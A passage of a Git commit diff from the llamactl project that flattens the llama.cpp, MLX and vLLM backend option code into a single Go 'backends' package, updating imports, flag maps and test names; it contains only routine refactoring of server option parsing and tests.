mirror of
https://github.com/lordmathis/llamactl.git
synced 2025-11-06 00:54:23 +00:00
Flatten backends package structure
This commit is contained in:
@@ -8,3 +8,15 @@ const (
|
|||||||
BackendTypeVllm BackendType = "vllm"
|
BackendTypeVllm BackendType = "vllm"
|
||||||
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
|
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
|
||||||
)
|
)
|
||||||
|
|
||||||
|
type Options struct {
|
||||||
|
BackendType BackendType `json:"backend_type"`
|
||||||
|
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||||
|
|
||||||
|
Nodes map[string]struct{} `json:"-"`
|
||||||
|
|
||||||
|
// Backend-specific options
|
||||||
|
LlamaServerOptions *LlamaServerOptions `json:"-"`
|
||||||
|
MlxServerOptions *MlxServerOptions `json:"-"`
|
||||||
|
VllmServerOptions *VllmServerOptions `json:"-"`
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,15 +1,14 @@
|
|||||||
package llamacpp
|
package backends
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"llamactl/pkg/backends"
|
|
||||||
"reflect"
|
"reflect"
|
||||||
"strconv"
|
"strconv"
|
||||||
)
|
)
|
||||||
|
|
||||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||||
// Used for both parsing (with underscores) and building (with dashes)
|
// Used for both parsing (with underscores) and building (with dashes)
|
||||||
var multiValuedFlags = map[string]bool{
|
var llamaMultiValuedFlags = map[string]bool{
|
||||||
// Parsing keys (with underscores)
|
// Parsing keys (with underscores)
|
||||||
"override_tensor": true,
|
"override_tensor": true,
|
||||||
"override_kv": true,
|
"override_kv": true,
|
||||||
@@ -338,8 +337,8 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
|
|||||||
// BuildCommandArgs converts InstanceOptions to command line arguments
|
// BuildCommandArgs converts InstanceOptions to command line arguments
|
||||||
func (o *LlamaServerOptions) BuildCommandArgs() []string {
|
func (o *LlamaServerOptions) BuildCommandArgs() []string {
|
||||||
// Llama uses multiple flags for arrays by default (not comma-separated)
|
// Llama uses multiple flags for arrays by default (not comma-separated)
|
||||||
// Use package-level multiValuedFlags variable
|
// Use package-level llamaMultiValuedFlags variable
|
||||||
return backends.BuildCommandArgs(o, multiValuedFlags)
|
return BuildCommandArgs(o, llamaMultiValuedFlags)
|
||||||
}
|
}
|
||||||
|
|
||||||
func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
||||||
@@ -356,10 +355,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
|||||||
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
|
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
|
||||||
executableNames := []string{"llama-server"}
|
executableNames := []string{"llama-server"}
|
||||||
var subcommandNames []string // Llama has no subcommands
|
var subcommandNames []string // Llama has no subcommands
|
||||||
// Use package-level multiValuedFlags variable
|
// Use package-level llamaMultiValuedFlags variable
|
||||||
|
|
||||||
var llamaOptions LlamaServerOptions
|
var llamaOptions LlamaServerOptions
|
||||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
|
if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1,16 +1,16 @@
|
|||||||
package llamacpp_test
|
package backends_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
"llamactl/pkg/backends"
|
||||||
"reflect"
|
"reflect"
|
||||||
"slices"
|
"slices"
|
||||||
"testing"
|
"testing"
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_BasicFields(t *testing.T) {
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
@@ -42,30 +42,30 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
options llamacpp.LlamaServerOptions
|
options backends.LlamaServerOptions
|
||||||
expected []string
|
expected []string
|
||||||
excluded []string
|
excluded []string
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
name: "verbose true",
|
name: "verbose true",
|
||||||
options: llamacpp.LlamaServerOptions{
|
options: backends.LlamaServerOptions{
|
||||||
Verbose: true,
|
Verbose: true,
|
||||||
},
|
},
|
||||||
expected: []string{"--verbose"},
|
expected: []string{"--verbose"},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "verbose false",
|
name: "verbose false",
|
||||||
options: llamacpp.LlamaServerOptions{
|
options: backends.LlamaServerOptions{
|
||||||
Verbose: false,
|
Verbose: false,
|
||||||
},
|
},
|
||||||
excluded: []string{"--verbose"},
|
excluded: []string{"--verbose"},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "multiple booleans",
|
name: "multiple booleans",
|
||||||
options: llamacpp.LlamaServerOptions{
|
options: backends.LlamaServerOptions{
|
||||||
Verbose: true,
|
Verbose: true,
|
||||||
FlashAttn: true,
|
FlashAttn: true,
|
||||||
Mlock: false,
|
Mlock: false,
|
||||||
@@ -95,8 +95,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_NumericFields(t *testing.T) {
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
Threads: 4,
|
Threads: 4,
|
||||||
CtxSize: 2048,
|
CtxSize: 2048,
|
||||||
@@ -125,8 +125,8 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
Port: 0, // Should be excluded
|
Port: 0, // Should be excluded
|
||||||
Threads: 0, // Should be excluded
|
Threads: 0, // Should be excluded
|
||||||
Temperature: 0, // Should be excluded
|
Temperature: 0, // Should be excluded
|
||||||
@@ -152,8 +152,8 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||||
DrySequenceBreaker: []string{".", "!", "?"},
|
DrySequenceBreaker: []string{".", "!", "?"},
|
||||||
@@ -177,8 +177,8 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
Lora: []string{}, // Empty array should not generate args
|
Lora: []string{}, // Empty array should not generate args
|
||||||
OverrideTensor: []string{}, // Empty array should not generate args
|
OverrideTensor: []string{}, // Empty array should not generate args
|
||||||
}
|
}
|
||||||
@@ -193,9 +193,9 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
func TestLlamaCppBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||||
// Test snake_case to kebab-case conversion
|
// Test snake_case to kebab-case conversion
|
||||||
options := llamacpp.LlamaServerOptions{
|
options := backends.LlamaServerOptions{
|
||||||
CtxSize: 4096,
|
CtxSize: 4096,
|
||||||
GPULayers: 32,
|
GPULayers: 32,
|
||||||
ThreadsBatch: 2,
|
ThreadsBatch: 2,
|
||||||
@@ -223,7 +223,7 @@ func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
|
||||||
jsonData := `{
|
jsonData := `{
|
||||||
"model": "/path/to/model.gguf",
|
"model": "/path/to/model.gguf",
|
||||||
"port": 8080,
|
"port": 8080,
|
||||||
@@ -234,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
|||||||
"temp": 0.7
|
"temp": 0.7
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var options llamacpp.LlamaServerOptions
|
var options backends.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(jsonData), &options)
|
err := json.Unmarshal([]byte(jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -263,16 +263,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
jsonData string
|
jsonData string
|
||||||
checkFn func(llamacpp.LlamaServerOptions) error
|
checkFn func(backends.LlamaServerOptions) error
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
name: "threads alternatives",
|
name: "threads alternatives",
|
||||||
jsonData: `{"t": 4, "tb": 2}`,
|
jsonData: `{"t": 4, "tb": 2}`,
|
||||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||||
if opts.Threads != 4 {
|
if opts.Threads != 4 {
|
||||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||||
}
|
}
|
||||||
@@ -285,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "context size alternatives",
|
name: "context size alternatives",
|
||||||
jsonData: `{"c": 2048}`,
|
jsonData: `{"c": 2048}`,
|
||||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||||
if opts.CtxSize != 2048 {
|
if opts.CtxSize != 2048 {
|
||||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||||
}
|
}
|
||||||
@@ -295,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "gpu layers alternatives",
|
name: "gpu layers alternatives",
|
||||||
jsonData: `{"ngl": 16}`,
|
jsonData: `{"ngl": 16}`,
|
||||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||||
if opts.GPULayers != 16 {
|
if opts.GPULayers != 16 {
|
||||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||||
}
|
}
|
||||||
@@ -305,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "model alternatives",
|
name: "model alternatives",
|
||||||
jsonData: `{"m": "/path/model.gguf"}`,
|
jsonData: `{"m": "/path/model.gguf"}`,
|
||||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||||
if opts.Model != "/path/model.gguf" {
|
if opts.Model != "/path/model.gguf" {
|
||||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||||
}
|
}
|
||||||
@@ -315,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "temperature alternatives",
|
name: "temperature alternatives",
|
||||||
jsonData: `{"temp": 0.8}`,
|
jsonData: `{"temp": 0.8}`,
|
||||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||||
if opts.Temperature != 0.8 {
|
if opts.Temperature != 0.8 {
|
||||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||||
}
|
}
|
||||||
@@ -326,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
var options llamacpp.LlamaServerOptions
|
var options backends.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -339,24 +339,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||||
|
|
||||||
var options llamacpp.LlamaServerOptions
|
var options backends.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||||
if err == nil {
|
if err == nil {
|
||||||
t.Error("Expected error for invalid JSON")
|
t.Error("Expected error for invalid JSON")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||||
jsonData := `{
|
jsonData := `{
|
||||||
"lora": ["adapter1.bin", "adapter2.bin"],
|
"lora": ["adapter1.bin", "adapter2.bin"],
|
||||||
"override_tensor": ["tensor1", "tensor2"],
|
"override_tensor": ["tensor1", "tensor2"],
|
||||||
"dry_sequence_breaker": [".", "!", "?"]
|
"dry_sequence_breaker": [".", "!", "?"]
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var options llamacpp.LlamaServerOptions
|
var options backends.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(jsonData), &options)
|
err := json.Unmarshal([]byte(jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -423,7 +423,7 @@ func TestParseLlamaCommand(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
result, err := llamacpp.ParseLlamaCommand(tt.command)
|
result, err := backends.ParseLlamaCommand(tt.command)
|
||||||
|
|
||||||
if tt.expectErr {
|
if tt.expectErr {
|
||||||
if err == nil {
|
if err == nil {
|
||||||
@@ -446,7 +446,7 @@ func TestParseLlamaCommand(t *testing.T) {
|
|||||||
|
|
||||||
func TestParseLlamaCommandValues(t *testing.T) {
|
func TestParseLlamaCommandValues(t *testing.T) {
|
||||||
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
|
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
|
||||||
result, err := llamacpp.ParseLlamaCommand(command)
|
result, err := backends.ParseLlamaCommand(command)
|
||||||
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("unexpected error: %v", err)
|
t.Fatalf("unexpected error: %v", err)
|
||||||
@@ -475,7 +475,7 @@ func TestParseLlamaCommandValues(t *testing.T) {
|
|||||||
|
|
||||||
func TestParseLlamaCommandArrays(t *testing.T) {
|
func TestParseLlamaCommandArrays(t *testing.T) {
|
||||||
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
|
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
|
||||||
result, err := llamacpp.ParseLlamaCommand(command)
|
result, err := backends.ParseLlamaCommand(command)
|
||||||
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("unexpected error: %v", err)
|
t.Fatalf("unexpected error: %v", err)
|
||||||
@@ -1,8 +1,4 @@
|
|||||||
package mlx
|
package backends
|
||||||
|
|
||||||
import (
|
|
||||||
"llamactl/pkg/backends"
|
|
||||||
)
|
|
||||||
|
|
||||||
type MlxServerOptions struct {
|
type MlxServerOptions struct {
|
||||||
// Basic connection options
|
// Basic connection options
|
||||||
@@ -33,7 +29,7 @@ type MlxServerOptions struct {
|
|||||||
// BuildCommandArgs converts to command line arguments
|
// BuildCommandArgs converts to command line arguments
|
||||||
func (o *MlxServerOptions) BuildCommandArgs() []string {
|
func (o *MlxServerOptions) BuildCommandArgs() []string {
|
||||||
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
|
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
|
||||||
return backends.BuildCommandArgs(o, multipleFlags)
|
return BuildCommandArgs(o, multipleFlags)
|
||||||
}
|
}
|
||||||
|
|
||||||
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
|
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
|
||||||
@@ -48,7 +44,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) {
|
|||||||
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
|
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
|
||||||
|
|
||||||
var mlxOptions MlxServerOptions
|
var mlxOptions MlxServerOptions
|
||||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
package mlx_test
|
package backends_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"llamactl/pkg/backends/mlx"
|
"llamactl/pkg/backends"
|
||||||
"testing"
|
"testing"
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -50,7 +50,7 @@ func TestParseMlxCommand(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
result, err := mlx.ParseMlxCommand(tt.command)
|
result, err := backends.ParseMlxCommand(tt.command)
|
||||||
|
|
||||||
if tt.expectErr {
|
if tt.expectErr {
|
||||||
if err == nil {
|
if err == nil {
|
||||||
@@ -73,7 +73,7 @@ func TestParseMlxCommand(t *testing.T) {
|
|||||||
|
|
||||||
func TestParseMlxCommandValues(t *testing.T) {
|
func TestParseMlxCommandValues(t *testing.T) {
|
||||||
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
|
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
|
||||||
result, err := mlx.ParseMlxCommand(command)
|
result, err := backends.ParseMlxCommand(command)
|
||||||
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("unexpected error: %v", err)
|
t.Fatalf("unexpected error: %v", err)
|
||||||
@@ -100,8 +100,8 @@ func TestParseMlxCommandValues(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs(t *testing.T) {
|
func TestMlxBuildCommandArgs(t *testing.T) {
|
||||||
options := &mlx.MlxServerOptions{
|
options := &backends.MlxServerOptions{
|
||||||
Model: "/test/model.mlx",
|
Model: "/test/model.mlx",
|
||||||
Host: "127.0.0.1",
|
Host: "127.0.0.1",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
@@ -1,11 +1,7 @@
|
|||||||
package vllm
|
package backends
|
||||||
|
|
||||||
import (
|
// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||||
"llamactl/pkg/backends"
|
var vllmMultiValuedFlags = map[string]bool{
|
||||||
)
|
|
||||||
|
|
||||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
|
||||||
var multiValuedFlags = map[string]bool{
|
|
||||||
"api-key": true,
|
"api-key": true,
|
||||||
"allowed-origins": true,
|
"allowed-origins": true,
|
||||||
"allowed-methods": true,
|
"allowed-methods": true,
|
||||||
@@ -155,7 +151,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {
|
|||||||
|
|
||||||
// Use package-level multipleFlags variable
|
// Use package-level multipleFlags variable
|
||||||
|
|
||||||
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
|
flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
|
||||||
args = append(args, flagArgs...)
|
args = append(args, flagArgs...)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
@@ -165,7 +161,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
|
|||||||
var args []string
|
var args []string
|
||||||
|
|
||||||
// Use package-level multipleFlags variable
|
// Use package-level multipleFlags variable
|
||||||
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
|
flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
|
||||||
args = append(args, flagArgs...)
|
args = append(args, flagArgs...)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
@@ -192,7 +188,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
var vllmOptions VllmServerOptions
|
var vllmOptions VllmServerOptions
|
||||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1,8 +1,7 @@
|
|||||||
package vllm_test
|
package backends_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"llamactl/pkg/backends/vllm"
|
"llamactl/pkg/backends"
|
||||||
"slices"
|
|
||||||
"testing"
|
"testing"
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -46,7 +45,7 @@ func TestParseVllmCommand(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
result, err := vllm.ParseVllmCommand(tt.command)
|
result, err := backends.ParseVllmCommand(tt.command)
|
||||||
|
|
||||||
if tt.expectErr {
|
if tt.expectErr {
|
||||||
if err == nil {
|
if err == nil {
|
||||||
@@ -69,7 +68,7 @@ func TestParseVllmCommand(t *testing.T) {
|
|||||||
|
|
||||||
func TestParseVllmCommandValues(t *testing.T) {
|
func TestParseVllmCommandValues(t *testing.T) {
|
||||||
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
|
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
|
||||||
result, err := vllm.ParseVllmCommand(command)
|
result, err := backends.ParseVllmCommand(command)
|
||||||
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("unexpected error: %v", err)
|
t.Fatalf("unexpected error: %v", err)
|
||||||
@@ -89,8 +88,8 @@ func TestParseVllmCommandValues(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs(t *testing.T) {
|
func TestVllmBuildCommandArgs(t *testing.T) {
|
||||||
options := vllm.VllmServerOptions{
|
options := backends.VllmServerOptions{
|
||||||
Model: "microsoft/DialoGPT-medium",
|
Model: "microsoft/DialoGPT-medium",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
@@ -137,17 +136,3 @@ func TestBuildCommandArgs(t *testing.T) {
|
|||||||
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
|
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Helper functions
|
|
||||||
func contains(slice []string, item string) bool {
|
|
||||||
return slices.Contains(slice, item)
|
|
||||||
}
|
|
||||||
|
|
||||||
func containsFlagWithValue(args []string, flag, value string) bool {
|
|
||||||
for i, arg := range args {
|
|
||||||
if arg == flag && i+1 < len(args) && args[i+1] == value {
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return false
|
|
||||||
}
|
|
||||||
@@ -3,7 +3,6 @@ package instance_test
|
|||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/config"
|
"llamactl/pkg/config"
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"llamactl/pkg/testutil"
|
"llamactl/pkg/testutil"
|
||||||
@@ -36,7 +35,7 @@ func TestNewInstance(t *testing.T) {
|
|||||||
|
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -108,7 +107,7 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
|||||||
MaxRestarts: &maxRestarts,
|
MaxRestarts: &maxRestarts,
|
||||||
RestartDelay: &restartDelay,
|
RestartDelay: &restartDelay,
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -156,7 +155,7 @@ func TestSetOptions(t *testing.T) {
|
|||||||
|
|
||||||
initialOptions := &instance.Options{
|
initialOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -170,7 +169,7 @@ func TestSetOptions(t *testing.T) {
|
|||||||
// Update options
|
// Update options
|
||||||
newOptions := &instance.Options{
|
newOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/new-model.gguf",
|
Model: "/path/to/new-model.gguf",
|
||||||
Port: 8081,
|
Port: 8081,
|
||||||
},
|
},
|
||||||
@@ -211,7 +210,7 @@ func TestSetOptions_PreservesNodes(t *testing.T) {
|
|||||||
initialOptions := &instance.Options{
|
initialOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
